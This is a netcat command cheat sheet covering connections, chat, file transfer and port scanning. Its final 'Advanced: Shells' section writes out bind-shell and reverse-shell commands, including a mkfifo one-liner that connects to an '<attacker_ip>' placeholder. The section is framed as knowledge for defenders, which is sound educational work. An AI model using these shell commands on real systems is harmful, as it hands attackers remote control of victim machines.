nc (Netcat) Command Cheat Sheet

nc is often referred to as the "Swiss Army knife" of networking tools. It reads and writes data across network connections using TCP or UDP.

Implementations: - netcat-traditional: The classic. - netcat-openbsd: Common on Debian/Ubuntu (supports IPv6, limited proxy options). - ncat (Nmap): The modern, feature-rich version (SSL support, proxies).

Synopsis

nc [options] [hostname] [port]

Client Mode

Connect to a Server

Connect to example.com on port 80.

nc example.com 80

Send HTTP Request manually

nc example.com 80
GET / HTTP/1.1
Host: example.com
(Press Enter twice)

Server Mode (Listen)

Start a Chat Server

1. Server: Listen on port 1234.

   nc -l -p 1234
   

2. Client: Connect to server.

   nc <server_ip> 1234
   

3. Type text in either terminal; it appears in the other.

File Transfer

Sender (Client) -> Receiver (Server)

1. Receiver: Listen and pipe to file.

   nc -l -p 1234 > received_file.zip
   

2. Sender: Connect and pipe file.

   nc <receiver_ip> 1234 < original_file.zip
   

Note: Once transfer is done, connection might not close automatically. Use -w 1 (timeout) or Ctrl+C manually.

Port Scanning

Although nmap is better, nc serves for quick checks.

Scan Single Port

nc -zv 192.168.1.1 22

Scan Range

nc -zv 192.168.1.1 20-80

UDP Scan (-u)

nc -zvu 192.168.1.1 53

Advanced: Shells

⚠️ Security Warning: Used by attackers for backdoors. Know this to defend against it.

Bind Shell (Server-side)

Execute /bin/bash when someone connects.

# Server (Victim)
nc -l -p 4444 -e /bin/bash

Reverse Shell (Client-side)

Connect TO the attacker and give them a shell. (Bypasses inbound firewall).

# Attacker (Server)
nc -l -p 4444

# Victim (Client)
nc <attacker_ip> 4444 -e /bin/bash

If -e is disabled (common on modern netcat):

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker_ip> 4444 >/tmp/f

Notes

• Timeouts: Use -w 5 to timeout after 5 seconds.
• Persistence: nc -k -l 1234 keeps the server listening after a client disconnects (OpenBSD variant).